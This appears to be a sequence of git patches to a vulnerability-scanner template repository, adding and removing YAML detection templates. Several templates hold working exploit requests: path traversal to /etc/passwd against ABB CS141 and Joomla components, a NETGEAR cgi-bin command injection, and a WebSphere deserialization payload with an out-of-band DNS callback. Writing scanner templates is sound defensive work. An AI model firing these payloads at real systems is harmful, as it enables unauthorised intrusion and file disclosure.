"Cross-Origin-Opener-Policy" part: header + + - type: regex + name: cross-origin-opener-policy + regex: + - "(?i)cross-origin-opener-policy" negative: true - - type: word - name: "Cross-Origin-Resource-Policy" - words: - - "Cross-Origin-Resource-Policy" part: header + + - type: regex + name: cross-origin-resource-policy + regex: + - "(?i)cross-origin-resource-policy" negative: true - - type: word - name: "Access-Control-Allow-Origin" - words: - - "Access-Control-Allow-Origin" part: header + + - type: regex + name: access-control-allow-origin + regex: + - "(?i)access-control-allow-origin" negative: true - - type: word - name: "Access-Control-Allow-Credentials" - words: - - "Access-Control-Allow-Credentials" part: header + + - type: regex + name: access-control-allow-credentials + regex: + - "(?i)access-control-allow-credentials" negative: true - - type: word - name: "Access-Control-Expose-Headers" - words: - - "Access-Control-Expose-Headers" part: header + + - type: regex + name: access-control-expose-headers + regex: + - "(?i)access-control-expose-headers" negative: true - - type: word - name: "Access-Control-Max-Age" - words: - - "Access-Control-Max-Age" part: header + + - type: regex + name: access-control-max-age + regex: + - "(?i)access-control-max-age" negative: true - - type: word - name: "Access-Control-Allow-Methods" - words: - - "Access-Control-Allow-Methods" part: header + + - type: regex + name: access-control-allow-methods + regex: + - "(?i)access-control-allow-methods" negative: true - - type: word - name: "Access-Control-Allow-Headers" - words: - - "Access-Control-Allow-Headers" part: header - negative: true + + - type: regex + name: access-control-allow-headers + regex: + - "(?i)access-control-allow-headers" \ No newline at end of file From da27280259b5e870d1ed11bc12e30ff6500b0621 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 22:26:23 +0530 Subject: [PATCH 2017/4083] Added stop-at-first-match --- default-logins/abb/cs141-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index cb51eede2c..531ed5ae2d 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -45,6 +45,7 @@ requests: {"userName":"guest","password":"guest"} + stop-at-first-match: true matchers-condition: and matchers: - type: word From f6c72769cee9a58a4cb3e110418008c0a8d805ba Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 22:29:55 +0530 Subject: [PATCH 2018/4083] temporary moving to another branch --- cves/2020/CVE-2020-11420.yaml | 36 ----------------------------------- 1 file changed, 36 deletions(-) delete mode 100644 cves/2020/CVE-2020-11420.yaml diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml deleted file mode 100644 index be676408b1..0000000000 --- a/cves/2020/CVE-2020-11420.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-11420 - -info: - name: ABB UPS Adapter CS141 – Path traversal - author: socketz - severity: medium - description: | - A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker - with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that - reference files and by doing this achieve access to files and directories outside the web root folder. An - attacker may access arbitrary files and directories stored in the file system, but integrity of the files are - not jeopardized as attacker have read access rights only. This attack is commonly known as Path - Traversal or Directory Traversal. - This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, - and then you can exploit it, before that, you should wait. - reference: - - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf - tags: cve,cve2020,iot,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" - - headers: - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body \ No newline at end of file From 32fed54169da875c38d139b61143aa7344234ae9 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 22:35:58 +0530 Subject: [PATCH 2019/4083] removing duplicate templates and few updates --- miscellaneous/missing-csp.yaml | 17 ----------------- miscellaneous/missing-hsts.yaml | 17 ----------------- .../missing-x-content-type-options.yaml | 18 ------------------ miscellaneous/missing-x-frame-options.yaml | 19 ------------------- .../http-missing-security-headers.yaml | 4 ++-- 5 files changed, 2 insertions(+), 73 deletions(-) delete mode 100644 miscellaneous/missing-csp.yaml delete mode 100644 miscellaneous/missing-hsts.yaml delete mode 100644 miscellaneous/missing-x-content-type-options.yaml delete mode 100644 miscellaneous/missing-x-frame-options.yaml diff --git a/miscellaneous/missing-csp.yaml b/miscellaneous/missing-csp.yaml deleted file mode 100644 index 0d2a7dc176..0000000000 --- a/miscellaneous/missing-csp.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-csp -info: - name: CSP Not Enforced - author: geeknik - severity: info - description: Checks if there is a CSP header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''content-security-policy'')' diff --git a/miscellaneous/missing-hsts.yaml b/miscellaneous/missing-hsts.yaml deleted file mode 100644 index 3f07038249..0000000000 --- a/miscellaneous/missing-hsts.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-hsts -info: - name: Strict Transport Security Not Enforced - author: Dawid Czarnecki - severity: info - description: Checks if the HSTS is enabled by looking for Strict Transport Security response header. - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''strict-transport-security'')' diff --git a/miscellaneous/missing-x-content-type-options.yaml b/miscellaneous/missing-x-content-type-options.yaml deleted file mode 100644 index e059f4c9be..0000000000 --- a/miscellaneous/missing-x-content-type-options.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: missing-x-content-type-options - -info: - name: X-Content-Type-Options unidentified - author: G4L1T0 and @convisoappsec - severity: info - description: Check for X-Content-Type-Options header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''x-content-type-options'')' diff --git a/miscellaneous/missing-x-frame-options.yaml b/miscellaneous/missing-x-frame-options.yaml deleted file mode 100644 index a7bece93c3..0000000000 --- a/miscellaneous/missing-x-frame-options.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: missing-x-frame-options - -info: - name: Clickjacking (Missing XFO header) - author: kurohost - severity: low - tags: misc,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - "!contains(tolower(all_headers), 'x-frame-options')" diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 97d80d6c05..aef6738399 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -2,10 +2,10 @@ id: http-missing-security-headers info: name: HTTP Missing Security Headers - author: socketz + author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki severity: info description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers,misconfiguration,generic + tags: misconfig,generic requests: - method: GET From 735b1df1c56648acb0968bf9ef751e8bd68b3f17 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 3 Sep 2021 12:09:59 -0500 Subject: [PATCH 2020/4083] Update php-errors.yaml --- misconfiguration/php-errors.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index 11e7defb9f..02bd1efcb3 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -18,6 +18,7 @@ requests: - '(?i)Call to undefined method' - '(?i)You have an error in your SQL syntax' - '(?i)MySQL server version for the right syntax to use near' + - '(?i)MySQL cannot create a temporary file' - '(?i)PHP (Warning|Error)' - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' - '(?i)failed to open stream\:' @@ -35,3 +36,5 @@ requests: - '(?i)expects parameter [0-9]*' - '(?i)Debug Trace' - '(?i)(syntax|parse) error' + - '(?i)Allowed Memory Size of \d* Bytes Exhausted' + - '(?i)Maximum execution time of \d* seconds exceeded' From c61276d34e70fff0663c8ed8f2f9b3666a6aa8e8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 4 Sep 2021 10:35:49 +0700 Subject: [PATCH 2021/4083] Create CVE-2010-1476.yaml --- cves/2010/CVE-2010-1476.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1476.yaml diff --git a/cves/2010/CVE-2010-1476.yaml b/cves/2010/CVE-2010-1476.yaml new file mode 100644 index 0000000000..c1718acac9 --- /dev/null +++ b/cves/2010/CVE-2010-1476.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1476 + +info: + name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12150 + - https://www.cvedetails.com/cve/CVE-2010-1476 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 4c0e1b9fea4844601c6f7bff4175802ebc841b3b Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 4 Sep 2021 11:00:25 +0700 Subject: [PATCH 2022/4083] Create CVE-2010-1307.yaml --- cves/2010/CVE-2010-1307.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1307.yaml diff --git a/cves/2010/CVE-2010-1307.yaml b/cves/2010/CVE-2010-1307.yaml new file mode 100644 index 0000000000..70c1ac485f --- /dev/null +++ b/cves/2010/CVE-2010-1307.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1307 + +info: + name: Joomla! Component Magic Updater - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12070 + - https://www.cvedetails.com/cve/CVE-2010-1307 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From f1e770fc06be144b7d1d291bc003df15ab5eee65 Mon Sep 17 00:00:00 2001 From: idealphase <mynameisphase@gmail.com> Date: Sat, 4 Sep 2021 14:00:28 +0700 Subject: [PATCH 2023/4083] Added CVE-2019-18818 Added CVE-2019-18818 --- cves/2019/CVE-2019-18818.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2019/CVE-2019-18818.yaml diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml new file mode 100644 index 0000000000..b4c3f64440 --- /dev/null +++ b/cves/2019/CVE-2019-18818.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-18818 + +info: + name: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) + author: idealphase + description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + reference: + - https://www.exploit-db.com/exploits/50239 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + severity: critical + tags: cve,cve2019,strapi,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/strapiVersion" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "strapiVersion" + part: body + + - type: word + words: + - '3.0.0-beta.17.4' + part: bod From 226d48db4c443e82cd0189b0ab9a51380f401b9c Mon Sep 17 00:00:00 2001 From: idealphase <mynameisphase@gmail.com> Date: Sat, 4 Sep 2021 14:07:24 +0700 Subject: [PATCH 2024/4083] Update CVE-2019-18818.yaml Added matchers header --- cves/2019/CVE-2019-18818.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index b4c3f64440..7ceb685ff8 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -20,6 +20,11 @@ requests: - type: status status: - 200 + + - type: word + words: + - "application/json" + part: header - type: word words: @@ -29,4 +34,4 @@ requests: - type: word words: - '3.0.0-beta.17.4' - part: bod + part: body From b7a05877682ac3240b8f85077253082c93a1f280 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 4 Sep 2021 13:59:56 +0530 Subject: [PATCH 2025/4083] Update CVE-2019-18818.yaml --- cves/2019/CVE-2019-18818.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index 7ceb685ff8..01fceb5e82 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -20,7 +20,7 @@ requests: - type: status status: - 200 - + - type: word words: - "application/json" From a30ee89de4e745b233138b11894102b4183d949c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 4 Sep 2021 14:38:33 +0530 Subject: [PATCH 2026/4083] temporary removal This template requires support that will be part of next version of nuclei, as such keeping this template in PR till next nuclei release --- cves/2015/CVE-2015-7450.yaml | 51 ------------------------------------ 1 file changed, 51 deletions(-) delete mode 100644 cves/2015/CVE-2015-7450.yaml diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml deleted file mode 100644 index a28bfc6ead..0000000000 --- a/cves/2015/CVE-2015-7450.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2015-7450 - -info: - name: IBM WebSphere Java Object Deserialization RCE - author: wdahlenb - severity: critical - description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) - reference: - - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml; charset=utf-8 - SOAPAction: "urn:AdminService" - - <?xml version='1.0' encoding='UTF-8'?> - <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> - <SOAP-ENV:Header ns0:JMXConnectorContext="rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4" xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.7" ns0:JMXMessageVersion="1.2.0" ns0:JMXVersion="1.2.0"> - </SOAP-ENV:Header> - <SOAP-ENV:Body> - <ns1:invoke xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> - <objectname xsi:type="ns1:javax.management.ObjectName">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname> - <operationname xsi:type="xsd:string">getUnsavedChanges</operationname> - <params xsi:type="ns1:[Ljava.lang.Object;">{{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}}</params> - <signature xsi:type="ns1:[Ljava.lang.String;">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature> - </ns1:invoke> - </SOAP-ENV:Body> - </SOAP-ENV:Envelope> - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - - type: word - words: - - 'SOAP-ENV:Server' - - '<faultcode>' - condition: and - - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" From 29b772a14b96a21e19d8eb2ecaf40304cdd0252c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 4 Sep 2021 16:45:28 +0700 Subject: [PATCH 2027/4083] Create CVE-2016-6277.yaml --- cves/2016/CVE-2016-6277.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2016/CVE-2016-6277.yaml diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml new file mode 100644 index 0000000000..6f61ebef3c --- /dev/null +++ b/cves/2016/CVE-2016-6277.yaml @@ -0,0 +1,27 @@ +id: CVE-2016-6277 + +info: + name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE + author: pikpikcu + severity: critical + reference: + - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + tags: cve,cves2016,netgear,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 82631062a1dee87b42a16043622e3b3ba4189c23 Mon Sep 